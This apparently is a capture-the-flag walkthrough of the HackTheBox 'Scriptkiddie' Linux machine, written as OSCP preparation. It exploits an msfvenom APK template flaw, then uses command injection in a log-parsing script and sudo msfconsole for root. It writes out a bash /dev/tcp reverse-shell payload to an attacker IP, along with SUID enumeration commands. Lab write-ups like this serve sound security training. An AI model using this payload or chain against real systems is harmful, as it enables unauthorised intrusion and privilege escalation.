OSCP PREPROTİONS – HTB Scriptkiddie

Scriptkiddie machine is a vulnerable machine with Linux operating system among retired machines. By using these vulnerabilities, it expects us to obtain user and root flags.
To recognize the target machine, we first perform a network scan with nmap.
Classic Scan

Port scanning shows that 22/tcp ssh OpenSSH 8.2p1 and 5000/tcp http Werkzeug ports are open. Since there is no vulnerability on the ssh port, we continue the enumeration on port 5000.
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
Let’s do a search on the port
(Werkzeug: Werkzeug is a comprehensive WSGI web application library. WSGI (Web Server Gateway Interface) is a specification that describes how a web server communicates with web applications and how web applications can be chained together to process a request. https://werkzeug.palletsprojects.com/en/2.3.x/)

There are nmap, payloads, sploits options, we tested these options and they work. We checked with gobuster to see if there are any different directories or files.

The directory search yielded no results, so we are focusing entirely on the Werkzeug side.
We realized that there are nmap, searchploit and msfvenom tools here.
We are looking from searcsploit to see if there is a vulnerability on msfvenom on their web side.

We understand that there is a vulnerability related to Msfvenom, let’s create shelli from our attacker machine here

We change the payload part of the exploiti code we saved with nano, here we will run our Shell file on the other side.

We have edited the payload part, next is the creation of the exploit

We created the exploit and moved it to our main folder as evil.apk
After moving evil.apk to the main folder, let’s create the Shell.sh file in payloaf

Our shell file has been created, now let’s serve a web server with pyhon so that we can access our exploit evila.pk

As we can see our shell was taken and gave us revershell

Here we got our user flag.
Let’s provide privilege escalation when we don’t have access to /root directory

To raise authorization on the machine we are providing local enumeration first

find / -perm -u=s -type f 2>/dev/null
find /pwn -perm -u=s -type f 2>/dev/null
commands to see what files are in there under root privileges.

/home/pwn/scanlosers.sh file draws our attention, let’s see what’s in it

Here command injection is expected to be done, we cut -f3 kouts tell us that the first 6 characters are cut and then this command is executed.
We will give the appropriate revershell
/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.13/4723 0>1
We use the command.

The purpose of using # here is to make all commands after # a comment line.
After running this command, we have shell from user pwn

Again we did not have root access. We provide local enumeration to perform privilege escalation again.
We run sudo -l to see who has sudo privileges

Here msfconsole is running under sudo authorization.
Let’s see how we can run it with root privileges by gtobins

Using /bin/bash commands, we have root privileges.

Here we got the root flag.